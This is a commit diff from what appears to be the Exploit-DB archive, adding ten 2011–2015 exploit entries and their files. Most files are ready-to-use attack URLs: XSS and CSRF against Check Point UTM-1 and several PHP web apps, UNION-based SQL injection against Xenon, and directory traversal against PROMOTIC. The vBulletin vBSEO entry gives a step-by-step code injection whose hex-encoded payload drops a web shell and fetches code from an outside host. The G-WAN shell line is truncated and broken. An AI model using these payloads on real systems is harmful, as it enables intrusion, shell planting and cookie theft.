Update: 2015-03-04

10 new exploits

files.csv

@@ -32638,6 +32638,7 @@ id,file,description,date,author,platform,type,port
 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
+36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0
 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting Vulnerability",2011-10-06,"Stefan Schurtz",php,webapps,0
 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 'resolute.php' Information Disclosure Vulnerability",2011-10-07,"cr4wl3r ",php,webapps,0
 36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component 'id' Parameter SQL Injection Vulnerability",2011-10-09,"BHG Security Center",php,webapps,0
@@ -32654,3 +32655,12 @@ id,file,description,date,author,platform,type,port
 36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0
 36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 'id' Parameter SQL Injection Vulnerability",2011-10-12,"BHG Security Center",php,webapps,0
 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
+36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability",2015-03-02,Net.Edit0r,php,webapps,80
+36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0
+36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability",2011-10-13,"Fredrik Widlund",multiple,dos,0
+36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 Multiple Security Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0
+36236,platforms/php/webapps/36236.txt,"Xenon 'id' Parameter Multiple SQL Injection Vulnerabilities",2011-10-14,m3rciL3Ss,php,webapps,0
+36237,platforms/php/webapps/36237.txt,"asgbookphp 1.9 'index.php' Cross Site Scripting Vulnerability",2011-10-17,indoushka,php,webapps,0
+36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass Vulnerability",2011-10-17,"Deral Heiland PercX",multiple,remote,0
+36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0
+36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0

platforms/hardware/remote/36239.txt

@@ -0,0 +1,75 @@
+source: http://www.securityfocus.com/bid/50189/info
+
+Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including:
+
+1. Multiple cross-site scripting vulnerabilities
+2. Multiple HTML-injection vulnerabilities
+3. Multiple cross-site request forgery vulnerabilities
+4. Multiple URI-redirection vulnerabilities
+5. An information-disclosure vulnerability
+
+An attacker may leverage these issues to access sensitive information, redirect an unsuspecting victim to an attacker-controlled site, or steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session.
+
+Versions prior to Check Point UTM-1 Edge and Safe 8.2.44 are vulnerable. 
+
+Tested on versions 7.5.48x, 8.1.46x and 8.2.2x.
+
+
+1) The following demonstrate the reflective XSS flaws:-
+
+a) The Ufp.html page is vulnerable to XSS via the url parameter
+It works by submitting a malicious url parameter to the ufp.html page
+http://www.example.com/pub/ufp.html?url=";><script>alert(1)</script>&mask=000&swpreview=1
+
+This works with firmware versions 7.5.48x, 8.1.46x and 8.2.2x.
+
+b) The login page is also vulnerable to an XSS via the malicious session cookie
+It works by submitting a malicious session cookie to the login page
+Cookie: session="><script>alert(1)</script>
+
+c) An authenticated XSS exists within the diagnostics command
+http://www.example.com/diag_command.html?sw__ver=blah1&swdata=blah2&sw__custom='";);alert(1);//
+(this might need to be submitted twice)
+
+
+2) The following demonstrate the persistent XSS flaws and XSRF flaws:-
+
+a) The blocked URL warning page is vulnerable to a persistent XSS attack placing any internal users at risk of attack 
+when the page is displayed.
+
+First an attacker has to trick the administrator to follow a XSRF attack; the (swsessioncookie) session cookie for 
+simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
+http://www.example.com/UfpBlock.html?swcaller=UfpBlock.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&ufpblockhttps=0&ufpbreakframe=&backurl=WebRules.html&ufpblockterms=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
+
+Firewall users then visiting blocked sites will have the blocked page displayed and the attack carried out.
+http://www.example.com/pub/ufp.html?url=www.blockedUrl.com&mask=000&swpreview=1
+
+b) The Wi-Fi hotspot landing page on Wi-Fi enabled firewalls is also vulnerable, with any user using the Wi-Fi access 
+point being at risk.
+
+First an attacker has to trick the administrator to follow a XSRF attack, the (swsessioncookie) session cookie for 
+simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
+http://www.example.com/HotSpot.html?swcaller=HotSpot.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&hotspotnets=00000000000000000000000000000000000000&hotspotpass=1&hotspotmulti=1&hotspothttps=0&hotspotnet1=0&hotspotnet2=0&hotspotnet3=0&hotspotenf=0&hotspottitle=Welcome+to+My+HotSpot&hotspotterms=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&thotspotpass=on&thotspotmulti=on
+
+Firewall users then visiting the Wi-Fi landing page will then have the attack carried out.
+http://www.example.com/pub/hotspot.html?swpreview=1
+
+
+3) The following demonstrate the (authenticated) offsite redirection flaws:-
+
+a) Enter the following URL to redirect
+http://www.example.com/12?swcaller=http://www.procheckup.com
+
+b) Enter the following URL and then press back button.
+http://www.example.com/UfpBlock.html?backurl=http://www.procheckup.com
+
+4) The following demonstrate the Information disclosure flaws (no authentication needed)
+It was found that the /pub/test.html program disclosed information, regarding the patch level used, licensing and the 
+MAC addresses to unauthenticated users.
+
+a) On early firmware versions 5.0.82x, 6.0.72x & 7.0.27x 7.5.48x
+Just requesting http:// www.example.com/pub/test.html is sufficient
+
+b) However this no longer worked on versions 8.1.46x & 8.2.26x however adding the URL parameter and a double quote 
+bypassed this check
+https:// www.example.com/pub/test.html?url="

platforms/multiple/dos/36234.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50108/info
+
+G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability.
+
+Remote attackers can exploit these issues to execute arbitrary code in the context of the application or crash the affected application.
+
+G-WAN 2.10.6 is vulnerable; other versions may also be affected. 
+
+while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n' 

platforms/multiple/remote/36238.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50168/info
+
+Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability.
+
+Successful exploits will allow attackers to bypass certain security restrictions and gain access in the context of the device. 
+
+http://www.example.com/TopAccess//Administrator/Setup/ScanToFile/List.htm 

platforms/php/webapps/36232.txt

@@ -0,0 +1,43 @@
+#################################################################################################################
+[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
+[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
+[+] My Homepage: black-hg.org / nasirpour.info
+[+] Date: [2015 27 February]
+[+] Vendor Homepage: vBulletin.com
+[+] Tested on: [vBulletin 4.2.2]
+[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg )
+#################################################################################################################
+Remote Code Injection:
++++++++++++++++++++++++++
+1) You Must Register In The vBulletin http://server/register.php example:[blackhat]
+
+2) go to your user profile example: [http://server/members/blackhat.html]
+
+3) post something in visitor message and record post data with live http header
+
+[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
+1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
+
+4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX"  [because vBulletin don't let you send same comment in a time]
+
+[Now post this with hackbar:]
+
+URL:  http://server/visitormessage.php?do=message
+
+[Post data]
+message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
+1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
+
+[And referrer data:] 
+PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
+
+[Example referrer data:] > upload downloader.php and s.php
+PoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents(
+"downloader.php","\x3C\x3F\x70\x68\x70\x0D\x0A\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x20\x3D\x20\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x73\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x69\x65\x6E\x63\x68\x61\x74\x2E\x63\x6F\x6D\x2F\x64\x2F\x64\x72\x2E\x74\x78\x74\x27\x29\x3B\x0D\x0A\x24\x66\x20\x3D\x20\x66\x6F\x70\x65\x6E\x28\x27\x73\x2E\x70\x68\x70\x27\x2C\x27\x77\x27\x29\x3B\x0D\x0A\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2C\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x29\x3B\x0D\x0A\x3F\x3E")}}]
+
+5- Open hackbar and tamper it with taper data:
+referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
+
+and submit request.
+
+################################################################################################################

platforms/php/webapps/36233.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/50096/info
+
+The Pretty Link plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Pretty Link Plugin 1.4.56 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script%3E
+http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php?message=%3Cscript% 3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?prli_blogurl=%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
+http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/errors.php?errors[]=%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E
+http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_re cord=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 

platforms/php/webapps/36236.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/50141/info
+
+Xenon is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables
+
+http://www.example.com/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273
+
+http://www.example.com/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables

platforms/php/webapps/36237.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50167/info
+
+asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt> 

platforms/php/webapps/36240.txt

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/50195/info
+
+Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+XSS:
+
+http://www.example.com/school/starnet/index.php?option=stats&suboption=&#039;"</style></script><script>alert(document.cookie)</script> 
+
+http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site=&#039;"</style></script><script>alert(document.cookie)</script> 
+
+http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script> 
+
+http://www.example.com/school/starnet/index.php?option=modulemanager&module=&#039;"</style></script><script>alert(document.cookie)</script>
+
+SQL Injection:
+
+http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection]
+
+http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]

platforms/windows/dos/36211.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49997/info
+
+Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users. 
+
+http://www.exploit-db.com/sploits/36211.zip

platforms/windows/remote/36235.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50133/info
+
+PROMOTIC is prone to multiple security vulnerabilities.
+
+Exploiting these issues may allow remote attackers to execute arbitrary code within the context of the affected application or disclose sensitive information.
+
+PROMOTIC 8.1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/webdir/..\..\..\..\..\boot.ini